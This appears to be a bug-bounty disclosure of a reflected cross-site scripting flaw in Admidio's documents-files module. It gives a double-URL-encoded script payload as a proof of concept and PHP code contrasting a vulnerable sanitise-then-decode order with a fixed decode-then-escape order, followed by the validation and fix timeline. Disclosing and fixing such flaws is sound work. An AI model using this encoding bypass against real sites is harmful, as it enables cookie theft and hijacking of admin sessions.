Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on Oct 18th 2021


Description

Reflected XSS is possible by using double URL encoding when retrieving files.

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

It is possible to trick admin users into visiting the malicious link, which executes the XSS and allows cookies to be stolen. It is also possible to execute actions as the admin user via malicious JavaScript.

Occurrences

HTML sanitisation should be done after all input has been transformed.
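The ordering problem described above, shown on the `name` value from the proof of concept. This is an added example, not Admidio's code: the two render functions are hypothetical, and `parse_str()` stands in for the single URL decode PHP performs when it fills `$_GET`.

```php
<?php
// Constructed request: the query string from the proof of concept above.
$query = 'mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e'
       . '%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e';

// PHP URL-decodes the query string once when populating $_GET; parse_str() does the same.
parse_str($query, $get);
$name = $get['name']; // still percent-encoded once at this point

// Hypothetical vulnerable order: sanitise first, transform afterwards.
function renderSanitiseThenDecode(string $value): string
{
    // The sanitiser sees only '%', hex digits and letters, so it changes nothing.
    $clean = htmlspecialchars(strip_tags($value), ENT_QUOTES, 'UTF-8');

    // The second decode runs after sanitisation and produces raw markup.
    return urldecode($clean);
}

// Hardened order: apply every transformation, then escape at the point of output.
function renderDecodeThenEscape(string $value): string
{
    $decoded = urldecode($value);

    return htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$unsafe = renderSanitiseThenDecode($name);
$safe   = renderDecodeThenEscape($name);

echo 'value after $_GET decoding: ', $name, PHP_EOL;
echo 'sanitise, then decode:      ', $unsafe, PHP_EOL;
echo 'decode, then escape:        ', $safe, PHP_EOL;

// A raw '<' in the rendered value means the browser would parse it as markup.
echo 'raw "<" in vulnerable output: ', var_export(strpos($unsafe, '<') !== false, true), PHP_EOL;
echo 'raw "<" in hardened output:   ', var_export(strpos($safe, '<') !== false, true), PHP_EOL;
```

Where the application has no need for a second decode, dropping it is the simpler fix, since values in `$_GET` are already decoded once by PHP.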

We have contacted a member of the admidio team and are waiting to hear back a month ago
haxatron modified their report a month ago
Markus Faßbender validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus Faßbender confirmed that a fix has been merged on 01a83d a month ago
Markus Faßbender has been awarded the fix bounty